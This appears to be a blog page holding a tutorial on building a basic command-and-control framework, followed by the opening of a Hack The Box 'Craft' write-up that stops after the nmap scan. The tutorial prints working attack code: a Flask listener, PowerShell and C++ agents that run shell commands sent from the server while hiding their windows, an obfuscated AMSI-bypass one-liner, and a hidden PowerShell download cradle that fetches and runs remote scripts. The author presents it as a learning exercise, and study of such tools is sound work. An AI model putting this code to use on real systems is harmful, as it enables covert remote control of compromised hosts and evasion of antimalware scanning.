❌

Normal view

There are new articles available, click to refresh the page.
Before yesterday0xRick

Building a Basic C2

By: 0xRick
16 April 2020 at 01:00

Introduction

It’s very common that after successful exploitation an attacker would put an agent that maintains communication with a c2 server on the compromised system, and the reason for that is very simple, having an agent that provides persistency over large periods and almost all the capabilities an attacker would need to perform lateral movement and other post-exploitation actions is better than having a reverse shell for example. There are a lot of free open source post-exploitation toolsets that provide this kind of capability, like Metasploit, Empire and many others, and even if you only play CTFs it’s most likely that you have used one of those before.

Long story short, I only had a general idea about how these tools work and I wanted to understand the internals of them, so I decided to try and build one on my own. For the last three weeks, I have been searching and coding, and I came up with a very basic implementation of a c2 server and an agent. In this blog post I’m going to explain the approaches I took to build the different pieces of the tool.

Please keep in mind that some of these approaches might not be the best and also the code might be kind of messy, If you have any suggestions for improvements feel free to contact me, I’d like to know what better approaches I could take. I also like to point out that this is not a tool to be used in real engagements, besides only doing basic actions like executing cmd and powershell, I didn’t take in consideration any opsec precautions.

This tool is still a work in progress, I finished the base but I’m still going to add more execution methods and more capabilities to the agent. After adding new features I will keep writing posts similar to this one, so that people with more experience give feedback and suggest improvements, while people with less experience learn.

You can find the tool on github.

Overview

About c2 servers / agents

As far as I know,

A basic c2 server should be able to:

  • Start and stop listeners.
  • Generate payloads.
  • Handle agents and task them to do stuff.

An agent should be able to:

  • Download and execute its tasks.
  • Send results.
  • Persist.

A listener should be able to:

  • Handle multiple agents.
  • Host files.

And all communications should be encrypted.

About the Tool

The server itself is written in python3, I wrote two agents, one in c++ and the other in powershell, listeners are http listeners.

I couldn’t come up with a nice name so I would appreciate suggestions.

Listeners

Basic Info

Listeners are the core functionality of the server because they provide the way of communication between the server and the agents. I decided to use http listeners, and I used flask to create the listener application.

A Listener object is instantiated with a name, a port and an IP address to bind to:

class Listener:    

    def __init__(self, name, port, ipaddress):
        
        self.name       = name
        self.port       = port
        self.ipaddress  = ipaddress
        ...

Then it creates the needed directories to store files, and other data like the encryption key and agents’ data:

...	
    	
self.Path       = "data/listeners/{}/".format(self.name)
self.keyPath    = "{}key".format(self.Path)
self.filePath   = "{}files/".format(self.Path)
self.agentsPath = "{}agents/".format(self.Path)
        
...
        
if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

if os.path.exists(self.agentsPath) == False:
    os.mkdir(self.agentsPath)

if os.path.exists(self.filePath) == False:
    os.mkdir(self.filePath)

...

After that it creates a key, saves it and stores it in a variable (more on generateKey() in the encryption part):

...
    
if os.path.exists(self.keyPath) == False:
    
    key      = generateKey()
    self.key = key
    
    with open(self.keyPath, "wt") as f:
        f.write(key)
else:
    with open(self.keyPath, "rt") as f:
        self.key = f.read()
            
...

The Flask Application

The flask application which provides all the functionality of the listener has 5 routes: /reg, /tasks/<name>, /results/<name>, /download/<name>, /sc/<name>.

/reg

/reg is responsible for handling new agents, it only accepts POST requests and it takes two parameters: name and type. name is for the hostname while type is for the agent’s type.

When it receives a new request it creates a random string of 6 uppercase letters as the new agent’s name (that name can be changed later), then it takes the hostname and the agent’s type from the request parameters. It also saves the remote address of the request which is the IP address of the compromised host.

With these information it creates a new Agent object and saves it to the agents database, and finally it responds with the generated random name so that the agent on the other side can know its name.

@self.app.route("/reg", methods=['POST'])
def registerAgent():
    name     = ''.join(choice(ascii_uppercase) for i in range(6))
    remoteip = flask.request.remote_addr
    hostname = flask.request.form.get("name")
    Type     = flask.request.form.get("type")
    success("Agent {} checked in.".format(name))
    writeToDatabase(agentsDB, Agent(name, self.name, remoteip, hostname, Type, self.key))
    return (name, 200)

/tasks/<name>

/tasks/<name> is the endpoint that agents request to download their tasks, <name> is a placeholder for the agent’s name, it only accepts GET requests.

It simply checks if there are new tasks (by checking if the tasks file exists), if there are new tasks it responds with the tasks, otherwise it sends an empty response (204).

@self.app.route("/tasks/<name>", methods=['GET'])
def serveTasks(name):
    if os.path.exists("{}/{}/tasks".format(self.agentsPath, name)):
        
        with open("{}{}/tasks".format(self.agentsPath, name), "r") as f:
            task = f.read()
            clearAgentTasks(name)
        
        return(task,200)
    else:
        return ('',204)

/results/<name>

/results/<name> is the endpoint that agents request to send results, <name> is a placeholder for the agent’s name, it only accepts POST requests and it takes one parameter: result for the results.

It takes the results and sends them to a function called displayResults() (more on that function in the agent handler part), then it sends an empty response 204.

@self.app.route("/results/<name>", methods=['POST'])
def receiveResults(name):
    result = flask.request.form.get("result")
    displayResults(name, result)
    return ('',204)

/download/<name>

/download/<name> is responsible for downloading files, <name> is a placeholder for the file name, it only accepts GET requests.

It reads the requested file from the files path and it sends it.

@self.app.route("/download/<name>", methods=['GET'])
def sendFile(name):
    f    = open("{}{}".format(self.filePath, name), "rt")
    data = f.read()
            
    f.close()
    return (data, 200)

/sc/<name>

/sc/<name> is just a wrapper around the /download/<name> endpoint for powershell scripts, it responds with a download cradle prepended with a oneliner to bypass AMSI, the oneliner downloads the original script from /download/<name> , <name> is a placeholder for the script name, it only accepts GET requests.

It takes the script name, creates a download cradle in the following format:

IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/download/SCRIPT_NAME')

and prepends that with the oneliner and responds with the full line.

@self.app.route("/sc/<name>", methods=['GET'])
def sendScript(name):
    amsi     = "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE](\"{1}{0}\"-F'F','rE' ) ) ; ( GeT-VariaBle ( \"1Q2U\" +\"zX\" ) -VaL).\"A`ss`Embly\".\"GET`TY`Pe\"(( \"{6}{3}{1}{4}{2}{0}{5}\" -f'Util','A','Amsi','.Management.','utomation.','s','System' )).\"g`etf`iElD\"( ( \"{0}{2}{1}\" -f'amsi','d','InitFaile' ),(\"{2}{4}{0}{1}{3}\" -f 'Stat','i','NonPubli','c','c,' )).\"sE`T`VaLUE\"(${n`ULl},${t`RuE} ); "
    oneliner = "{}IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/download/{}\')".format(amsi,self.ipaddress,str(self.port),name)
    
    return (oneliner, 200)

Starting and Stopping

I had to start listeners in threads, however flask applications don’t provide a reliable way to stop the application once started, the only way was to kill the process, but killing threads wasn’t also so easy, so what I did was creating a Process object for the function that starts the application, and a thread that starts that process which means that terminating the process would kill the thread and stop the application.

...
	
def run(self):
    self.app.logger.disabled = True
    self.app.run(port=self.port, host=self.ipaddress)

...
    
def start(self):
    
    self.server = Process(target=self.run)

    cli = sys.modules['flask.cli']
    cli.show_server_banner = lambda *x: None

    self.daemon = threading.Thread(name = self.name,
                                       target = self.server.start,
                                       args = ())
    self.daemon.daemon = True
    self.daemon.start()

    self.isRunning = True
    
def stop(self):
    
    self.server.terminate()
    self.server    = None
    self.daemon    = None
    self.isRunning = False

...

Agents

Basic Info

As mentioned earlier, I wrote two agents, one in powershell and the other in c++. Before going through the code of each one, let me talk about what agents do.

When an agent is executed on a system, first thing it does is get the hostname of that system then send the registration request to the server (/reg as discussed earlier).

After receiving the response which contains its name it starts an infinite loop in which it keeps checking if there are any new tasks, if there are new tasks it executes them and sends the results back to the server.

After each loop it sleeps for a specified amount of time that’s controlled by the server, the default sleep time is 3 seconds.

We can represent that in pseudo code like this:

get hostname
send [hostname, type], get name

loop{
	
	check if there are any new tasks
	
	if new_tasks{
    	
            execute tasks
    	    send results
    
    }
    
    else{
    	do nothing
    }
    
    sleep n 
}

So far, agents can only do two basic things, execute cmd and powershell.

PowerShell Agent

I won’t talk about the crypto functions here, I will leave that for the encryption part.

First 5 lines of the agent are just the basic variables which are the IP address, port, key, name and the time to sleep:

$ip   = "REPLACE_IP"
$port = "REPLACE_PORT"
$key  = "REPLACE_KEY"
$n    = 3
$name = ""

As mentioned earlier, It gets the hostname, sends the registration request and receives its name:

$hname = [System.Net.Dns]::GetHostName()
$type  = "p"
$regl  = ("http" + ':' + "//$ip" + ':' + "$port/reg")
$data  = @{
    name = "$hname" 
    type = "$type"
    }
$name  = (Invoke-WebRequest -UseBasicParsing -Uri $regl -Body $data -Method 'POST').Content

Based on the received name it creates the variables for the tasks uri and the results uri:

$resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
$taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")

Then it starts the infinite loop:

for (;;){
...
sleep $n
}

Let’s take a look inside the loop, first thing it does is request new tasks, we know that if there are no new tasks the server will respond with a 204 empty response, so it checks if the response is not null or empty and based on that it decides whether to execute the task execution code block or just sleep again:

$task  = (Invoke-WebRequest -UseBasicParsing -Uri $taskl -Method 'GET').Content
    
    if (-Not [string]::IsNullOrEmpty($task)){

Inside the task execution code block it takes the encrypted response and decrypts it, splits it then saves the first word in a variable called flag:

$task = Decrypt $key $task
$task = $task.split()
$flag = $task[0]

If the flag was VALID it will continue, otherwise it will sleep again. This ensures that the data has been decrypted correctly.

if ($flag -eq "VALID"){

After ensuring that the data is valid, it takes the command it’s supposed to execute and the arguments:

$command = $task[1]
$args    = $task[2..$task.Length]

There are 5 valid commands, shell, powershell, rename, sleep and quit.

shell executes cmd commands, powershell executes powershell commands, rename changes the agent’s name, sleep changes the sleep time and quit just exits.

Let’s take a look at each one of them. The shell and powershell commands basically rely on the same function called shell, so let’s look at that first:

function shell($fname, $arg){
    
    $pinfo                        = New-Object System.Diagnostics.ProcessStartInfo
    $pinfo.FileName               = $fname
    $pinfo.RedirectStandardError  = $true
    $pinfo.RedirectStandardOutput = $true
    $pinfo.UseShellExecute        = $false
    $pinfo.Arguments              = $arg
    $p                            = New-Object System.Diagnostics.Process
    $p.StartInfo                  = $pinfo
    
    $p.Start() | Out-Null
    $p.WaitForExit()
    
    $stdout = $p.StandardOutput.ReadToEnd()
    $stderr = $p.StandardError.ReadToEnd()

    $res = "VALID $stdout`n$stderr"
    $res
}

It starts a new process with the given file name whether it was cmd.exe or powershell.exe and passes the given arguments, then it receives stdout and stderr and returns the result which is the VALID flag appended with stdout and stderr separated by a newline.

Now back to the shell and powershell commands, both of them call shell() with the corresponding file name, receive the output, encrypt it and send it:

if ($command -eq "shell"){
    $f    = "cmd.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }
    elseif ($command -eq "powershell"){
    
    $f    = "powershell.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }

The sleep command updates the n variable then sends an empty result indicating that it completed the task:

elseif ($command -eq "sleep"){
    $n    = [int]$args[0]
    $data = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The rename command updates the name variable and updates the tasks and results uris, then it sends an empty result indicating that it completed the task:

elseif ($command -eq "rename"){
    $name    = $args[0]
    $resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
    $taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")
    
    $data    = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The quit command just exits:

elseif ($command -eq "quit"){
	exit
    }

C++ Agent

The same logic is applied in the c++ agent so I will skip the unnecessary parts and only talk about the http functions and the shell function.

Sending http requests wasn’t as easy as it was in powershell, I used the winhttp library and with the help of the Microsoft documentation I created two functions, one for sending GET requests and the other for sending POST requests. And they’re almost the same function so I guess I will rewrite them to be one function later.


std::string Get(std::string ip, unsigned int port, std::string uri)
{
    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"GET", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      WINHTTP_NO_ADDITIONAL_HEADERS,
                                      0,
                                      WINHTTP_NO_REQUEST_DATA,
                                      0,
                                      0,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;
}

std::string Post(std::string ip, unsigned int port, std::string uri, std::string dat)
{
    LPSTR data     = const_cast<char*>(dat.c_str());;
    DWORD data_len = strlen(data);

    LPCWSTR additionalHeaders = L"Content-Type: application/x-www-form-urlencoded\r\n";
    DWORD headersLength       = -1;

    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"POST", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      additionalHeaders,
                                      headersLength,
                                      (LPVOID)data,
                                      data_len,
                                      data_len,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;

}

The shell function does the almost the same thing as the shell function in the other agent, some of the code is taken from Stack Overflow and I edited it:


CStringA shell(const wchar_t* cmd)
{
    CStringA result;
    HANDLE hPipeRead, hPipeWrite;

    SECURITY_ATTRIBUTES saAttr = {sizeof(SECURITY_ATTRIBUTES)};
    saAttr.bInheritHandle = TRUE; 
    saAttr.lpSecurityDescriptor = NULL;

    
    if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0))
        return result;

    STARTUPINFOW si = {sizeof(STARTUPINFOW)};
    si.dwFlags     = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdOutput  = hPipeWrite;
    si.hStdError   = hPipeWrite;
    si.wShowWindow = SW_HIDE; 

    PROCESS_INFORMATION pi = { 0 };

    BOOL fSuccess = CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (! fSuccess)
    {
        CloseHandle(hPipeWrite);
        CloseHandle(hPipeRead);
        return result;
    }

    bool bProcessEnded = false;
    for (; !bProcessEnded ;)
    {
        bProcessEnded = WaitForSingleObject( pi.hProcess, 50) == WAIT_OBJECT_0;

        for (;;)
        {
            char buf[1024];
            DWORD dwRead = 0;
            DWORD dwAvail = 0;

            if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL))
                break;

            if (!dwAvail)
                break;

            if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead)
                break;

            buf[dwRead] = 0;
            result += buf;
        }
    }

    CloseHandle(hPipeWrite);
    CloseHandle(hPipeRead);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return result;
}

I would like to point out an important option in the process created by the shell function which is:

si.wShowWindow = SW_HIDE; 

This is responsible for hiding the console window, this is also added in the main() function of the agent to hide the console window:

int main(int argc, char const *argv[]) 
{

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    ...

Agent Handler

Now that we’ve talked about the agents, let’s go back to the server and take a look at the agent handler.

An Agent object is instantiated with a name, a listener name, a remote address, a hostname, a type and an encryption key:

class Agent:

    def __init__(self, name, listener, remoteip, hostname, Type, key):

        self.name      = name
        self.listener  = listener
        self.remoteip  = remoteip
        self.hostname  = hostname
        self.Type      = Type
        self.key       = key

Then it defines the sleep time which is 3 seconds by default as discussed, it needs to keep track of the sleep time to be able to determine if an agent is dead or not when removing an agent, otherwise it will keep waiting for the agent to call forever:

self.sleept    = 3

After that it creates the needed directories and files:

self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
self.tasksPath = "{}tasks".format(self.Path, self.name)

if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

And finally it creates the menu for the agent, but I won’t cover the Menu class in this post because it doesn’t relate to the core functionality of the tool.

self.menu = menu.Menu(self.name)
        
self.menu.registerCommand("shell", "Execute a shell command.", "<command>")
self.menu.registerCommand("powershell", "Execute a powershell command.", "<command>")
self.menu.registerCommand("sleep", "Change agent's sleep time.", "<time (s)>")
self.menu.registerCommand("clear", "Clear tasks.", "")
self.menu.registerCommand("quit", "Task agent to quit.", "")

self.menu.uCommands()

self.Commands = self.menu.Commands

I won’t talk about the wrapper functions because we only care about the core functions.

First function is the writeTask() function, which is a quite simple function, it takes the task and prepends it with the VALID flag then it writes it to the tasks path:

def writeTask(self, task):
    
    if self.Type == "p":
        task = "VALID " + task
        task = ENCRYPT(task, self.key)
    elif self.Type == "w":
        task = task
	
    with open(self.tasksPath, "w") as f:
            f.write(task)

As you can see, it only encrypts the task in case of powershell agent only, that’s because there’s no encryption in the c++ agent (more on that in the encryption part).

Second function I want to talk about is the clearTasks() function which just deletes the tasks file, very simple:

def clearTasks(self):
    
    if os.path.exists(self.tasksPath):
        os.remove(self.tasksPath)
    else:
        pass

Third function is a very important function called update(), this function gets called when an agent is renamed and it updates the paths. As seen earlier, the paths depend on the agent’s name, so without calling this function the agent won’t be able to download its tasks.

def update(self):
    
    self.menu.name = self.name
    self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
    self.tasksPath = "{}tasks".format(self.Path, self.name)
        
    if os.path.exists(self.Path) == False:
        os.mkdir(self.Path)

The remaining functions are wrappers that rely on these functions or helper functions that rely on the wrappers. One example is the shell function which just takes the command and writes the task:

def shell(self, args):
    
    if len(args) == 0:
        error("Missing command.")
    else:
        command = " ".join(args)
        task    = "shell " + command
        self.writeTask(task)

The last function I want to talk about is a helper function called displayResults which takes the sent results and the agent name. If the agent is a powershell agent it decrypts the results and checks their validity then prints them, otherwise it will just print the results:

def displayResults(name, result):

    if isValidAgent(name,0) == True:

        if result == "":
            success("Agent {} completed task.".format(name))
        else:
            
            key = agents[name].key
            
            if agents[name].Type == "p":

                try:
                    plaintext = DECRYPT(result, key)
                except:
                    return 0
            
                if plaintext[:5] == "VALID":
                    success("Agent {} returned results:".format(name))
                    print(plaintext[6:])
                else:
                    return 0
            
            else:
                success("Agent {} returned results:".format(name))
                print(result)

Payloads Generator

Any c2 server would be able to generate payloads for active listeners, as seen earlier in the agents part, we only need to change the IP address, port and key in the agent template, or just the IP address and port in case of the c++ agent.

PowerShell

Doing this with the powershell agent is simple because a powershell script is just a text file so we just need to replace the strings REPLACE_IP, REPLACE_PORT and REPLACE_KEY.

The powershell function takes a listener name, and an output name. It grabs the needed options from the listener then it replaces the needed strings in the powershell template and saves the new file in two places, /tmp/ and the files path for the listener. After doing that it generates a download cradle that requests /sc/ (the endpoint discussed in the listeners part).

def powershell(listener, outputname):
    
    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port
    key     = listeners[listener].key

    with open("./lib/templates/powershell.ps1", "rt") as p:
        payload = p.read()

    payload = payload.replace('REPLACE_IP',ip)
    payload = payload.replace('REPLACE_PORT',str(port))
    payload = payload.replace('REPLACE_KEY', key)

    with open(outpath, "wt") as f:
        f.write(payload)
    
    with open("{}{}".format(listeners[listener].filePath, outputname), "wt") as f:
        f.write(payload)

    oneliner = "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/sc/{}\')\"".format(ip, str(port), outputname)

    success("File saved in: {}".format(outpath))
    success("One liner: {}".format(oneliner))

Windows Executable (C++ Agent)

It wasn’t as easy as it was with the powershell agent, because the c++ agent would be a compiled PE executable.

It was a huge problem and I spent a lot of time trying to figure out what to do, that was when I was introduced to the idea of a stub.

The idea is to append whatever data that needs to be dynamically assigned to the executable, and design the program in a way that it reads itself and pulls out the appended information.

In the source of the agent I added a few lines of code that do the following:

  • Open the file as a file stream.
  • Move to the end of the file.
  • Read 2 lines.
  • Save the first line in the IP variable.
  • Save the second line in the port variable.
  • Close the file stream.
std::ifstream ifs(argv[0]);
	
ifs.seekg(TEMPLATE_EOF);
	
std::getline(ifs, ip);
std::getline(ifs, sPort);

ifs.close();

To get the right EOF I had to compile the agent first, then update the agent source and compile again according to the size of the file.

For example this is the current definition of TEMPLATE_EOF for the x64 agent:

#define TEMPLATE_EOF 52736

If we take a look at the size of the file we’ll find that it’s the same:

# ls -la
-rwxrwxr-x 1 ... ... 52736 ... ... ... winexe64.exe

The winexe function takes a listener name, an architecture and an output name, grabs the needed options from the listener and appends them to the template corresponding to the selected architecture and saves the new file in /tmp:

def winexe(listener, arch, outputname):

    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port

    if arch == "x64":
        copyfile("./lib/templates/winexe/winexe64.exe", outpath)
    elif arch == "x32":
        copyfile("./lib/templates/winexe/winexe32.exe", outpath)        
    
    with open(outpath, "a") as f:
        f.write("{}\n{}".format(ip,port))

    success("File saved in: {}".format(outpath))

Encryption

I’m not very good at cryptography so this part was the hardest of all. At first I wanted to use AES and do Diffie-Hellman key exchange between the server and the agent. However I found that powershell can’t deal with big integers without the .NET class BigInteger, and because I’m not sure that the class would be always available I gave up the idea and decided to hardcode the key while generating the payload because I didn’t want to risk the compatibility of the agent. I could use AES in powershell easily, however I couldn’t do the same in c++, so I decided to use a simple xor but again there were some issues, that’s why the winexe agent won’t be using any encryption until I figure out what to do.

Let’s take a look at the crypto functions in both the server and the powershell agent.

Server

The AESCipher class uses the AES class from the pycrypto library, it uses AES CBC 256.

An AESCipher object is instantiated with a key, it expects the key to be base-64 encoded:

class AESCipher:
    
    def __init__(self, key):

        self.key = base64.b64decode(key)
        self.bs  = AES.block_size

There are two functions to pad and unpad the text with zeros to match the block size:

def pad(self, s):
    return s + (self.bs - len(s) % self.bs) * "\x00"

def unpad(self, s):
    s = s.decode("utf-8")
    return s.rstrip("\x00")

The encryption function takes plain text, pads it, creates a random IV, encrypts the plain text and returns the IV + the cipher text base-64 encoded:

def encrypt(self, raw):
    
    raw      = self.pad(raw)
    iv       = Random.new().read(AES.block_size)
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    
    return base64.b64encode(iv + cipher.encrypt(raw.encode("utf-8")))

The decryption function does the opposite:

def decrypt(self,enc):
    
    enc      = base64.b64decode(enc)
    iv       = enc[:16]
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    plain    = cipher.decrypt(enc[16:])
    plain    = self.unpad(plain)
    
    return plain 

I created two wrapper function that rely on the AESCipher class to encrypt and decrypt data:

def ENCRYPT(PLAIN, KEY):

    c   = AESCipher(KEY)
    enc = c.encrypt(PLAIN)

    return enc.decode()

def DECRYPT(ENC, KEY):

    c   = AESCipher(KEY)
    dec = c.decrypt(ENC)

    return dec

And finally there’s the generateKey function which creates a random 32 bytes key and base-64 encodes it:

def generateKey():

    key    = base64.b64encode(os.urandom(32))
    return key.decode()

PowerShell Agent

The powershell agent uses the .NET class System.Security.Cryptography.AesManaged.

First function is the Create-AesManagedObject which instantiates an AesManaged object using the given key and IV. It’s a must to use the same options we decided to use on the server side which are CBC mode, zeros padding and 32 bytes key length:

function Create-AesManagedObject($key, $IV) {
    
    $aesManaged           = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize   = 256

After that it checks if the provided key and IV are of the type String (which means that the key or the IV is base-64 encoded), depending on that it decodes the data before using them, then it returns the AesManaged object.

if ($IV) {
        
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }
        
        else {
            $aesManaged.IV = $IV
        }
    }
    
    if ($key) {
        
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        }
        
        else {
            $aesManaged.Key = $key
        }
    }
    
    $aesManaged
}

The Encrypt function takes a key and a plain text string, converts that string to bytes, then it uses the Create-AesManagedObject function to create the AesManaged object and it encrypts the string with a random generated IV.

It returns the cipher text base-64 encoded.

function Encrypt($key, $unencryptedString) {
    
    $bytes             = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $aesManaged        = Create-AesManagedObject $key
    $encryptor         = $aesManaged.CreateEncryptor()
    $encryptedData     = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    $aesManaged.Dispose()
    [System.Convert]::ToBase64String($fullData)
}

The opposite of this process happens with the Decrypt function:

function Decrypt($key, $encryptedStringWithIV) {
    
    $bytes           = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $IV              = $bytes[0..15]
    $aesManaged      = Create-AesManagedObject $key $IV
    $decryptor       = $aesManaged.CreateDecryptor();
    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
    $aesManaged.Dispose()
    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)

}

Listeners / Agents Persistency

I used pickle to serialize agents and listeners and save them in databases, when you exit the server it saves all of the agent objects and listeners, then when you start it again it loads those objects again so you don’t lose your agents or listeners.

For the listeners, pickle can’t serialize objects that use threads, so instead of saving the objects themselves I created a dictionary that holds all the information of the active listeners and serialized that, the server loads that dictionary and starts the listeners again according to the options in the dictionary.

I created wrapper functions that read, write and remove objects from the databases:

def readFromDatabase(database):
    
    data = []

    with open(database, 'rb') as d:
        
        while True:
            try:
                data.append(pickle.load(d))
            except EOFError:
                break
    
    return data

def writeToDatabase(database,newData):
    
    with open(database, "ab") as d:
        pickle.dump(newData, d, pickle.HIGHEST_PROTOCOL)

def removeFromDatabase(database,name):
    
    data = readFromDatabase(database)
    final = OrderedDict()

    for i in data:
        final[i.name] = i
    
    del final[name]
    
    with open(database, "wb") as d:
        for i in final:
            pickle.dump(final[i], d , pickle.HIGHEST_PROTOCOL)

Demo

I will show you a quick demo on a Windows Server 2016 target.

This is how the home of the server looks like:




Let’s start by creating a listener:




Now let’s create a payload, I created the three available payloads:




After executing the payloads on the target we’ll see that the agents successfully contacted the server:




Let’s rename the agents:





I executed 4 simple commands on each agent:






Then I tasked each agent to quit.

And that concludes this blog post, as I said before I would appreciate all the feedback and the suggestions so feel free to contact me on twitter @Ahm3d_H3sham.

If you liked the article tweet about it, thanks for reading.

Hack The Box - Craft

By: 0xRick
4 January 2020 at 05:00

Hack The Box - Craft

Quick Summary

Hey guys, today Craft retired and here’s my write-up about it. It’s a medium rated Linux box and its ip is 10.10.10.110, I added it to /etc/hosts as craft.htb. Let’s jump right in !




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/craft# nmap -sV -sT -sC -o nmapinitial craft.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-03 13:41 EST
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey: 
|   2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
|   256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_  256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
